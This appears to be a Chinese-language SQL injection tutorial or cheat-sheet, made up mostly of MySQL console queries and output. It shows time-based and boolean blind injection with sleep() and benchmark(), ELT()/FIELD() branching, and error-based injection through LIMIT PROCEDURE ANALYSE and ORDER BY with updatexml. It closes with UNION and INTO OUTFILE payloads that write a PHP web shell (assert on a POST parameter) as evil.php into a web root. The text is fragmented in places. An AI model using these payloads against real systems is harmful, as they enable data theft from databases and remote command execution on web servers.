mysql> select * from testdata where id = 1 and 1 and sleep(1); Empty set (2.01 sec)
mysql> select * from testdata where id = 1 and 0 and sleep(1); Empty set (0.00 sec)
1 和 0 的地方就可以插入我们的判断语句
2. or 1 的短路特性
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
mysql> select * from testdata where id = 1 or 0 or sleep(1); +----+------+-------+ | id | name | pass | +----+------+-------+ | 1 | adad | afdsf | | 1 | adad | afdsf | +----+------+-------+ 2 rows in set (2.01 sec)
mysql> select * from testdata where id = 1 or 1 or sleep(1); +----+--------+----------+ | id | name | pass | +----+--------+----------+ | 2 | adsads | dfadf | | 3 | fas | agfsdfas | | 1 | adad | afdsf | | 1 | adad | afdsf | +----+--------+----------+ 4 rows in set (0.00 sec)
当检测到 or 1 的时候就不会继续检测,所以sleep就没有执行
除了上面两个我们还能用 case when then else end 这个句型,这个和 if 是类似的
3.elt() 的分流特性
1
ELT(N ,str1 ,str2 ,str3 ,…)
函数使用说明:若 N = 1 ,则返回值为 str1 ,若 N = 2 ,则返回值为 str2 ,以此类推。 若 N 小于 1 或大于参数的数目,则返回值为 NULL 。 ELT() 是 FIELD() 的补数
1 2 3 4 5 6 7 8 9 10 11
mysql> select * from testdata where id = 1 and elt((1>1)+1,1=1,sleep(1)); +----+------+-------+ | id | name | pass | +----+------+-------+ | 1 | adad | afdsf | | 1 | adad | afdsf | +----+------+-------+ 2 rows in set (0.01 sec)
mysql> select * from testdata where id = 1 and elt((1=1)+1,1=1,sleep(1)); Empty set (2.01 sec)
mysql> select * from testdata where id = 2 and field(1>1,sleep(2)); +----+--------+-------+ | id | name | pass | +----+--------+-------+ | 2 | adsads | dfadf | +----+--------+-------+ 1 row in set (2.00 sec)
mysql> select * from testdata where id = 2 and field(1=1,sleep(2)); Empty set (2.00 sec)
以上是基础
5.between…and注入
select password from users where password between 'a' and'd'
limit注入
在limit语句后面的注入
在LIMIT后面可以跟两个函数,PROCEDURE 和 INTO,INTO除非有写入shell的权限,否则是无法利用的,那么使用PROCEDURE函数能否注入呢? Let’s give it a try:
报错
1 2 3
mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)
order by 注入
本文讨论的内容指可控制的位置在order by子句后,如下order参数可控:select * from goods order by $_GET[‘order’]
1.如果有报错信息输出,可尝试通过报错注入完成sql注入攻击
1 2
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select database())),0)); ERROR 1105 (HY000): XPATH syntax error: '~security' //获取当前数据库
2.如果没有回显,可尝试盲注的手法来注入
1
select * from users order by id ^(select(select version()) regexp '^5');
基于时间的盲注
基于时间盲注的思路就是延迟注入,通过语句执行的时间来判断是true还是false,从而去fuzz。
我们常用的方法就是 sleep() 和 benchmark()
在我的表中, id 字段是数字类型,name和pass都是varchar,使用方法也是不同的,但是盲注不需要回显,看看返回时间长短就好了
1 2 3 4 5 6 7 8 9 10 11 12 13
mysql> select * from testdata where name = 1-sleep(1); Empty set, 4 warnings (4.01 sec)
mysql> select * from testdata where name = sleep(1); +----+--------+----------+ | id | name | pass | +----+--------+----------+ | 2 | adsads | dfadf | | 3 | fas | agfsdfas | | 1 | adad | afdsf | | 1 | adad | afdsf | +----+--------+----------+ 4 rows in set, 4 warnings (4.01 sec)
1 2 3 4 5 6 7 8 9 10
mysql> select * from testdata where name = benchmark(100000000,rand()); +----+--------+----------+ | id | name | pass | +----+--------+----------+ | 2 | adsads | dfadf | | 3 | fas | agfsdfas | | 1 | adad | afdsf | | 1 | adad | afdsf | +----+--------+----------+ 4 rows in set, 4 warnings (7.59 sec)
有 union id=2) union select 1,2,3,4,5,6,7,'<?php assert($_POST["cmd"]);?>’ into outfile ‘/home/wwwroot/shadowyspirits/evil.php’%23 1 无 union id=2) into outfile ‘/home/wwwroot/shadowyspirits/evil.php’ fields terminated by ‘<?php assert($_POST["cmd"]);?>’%23 1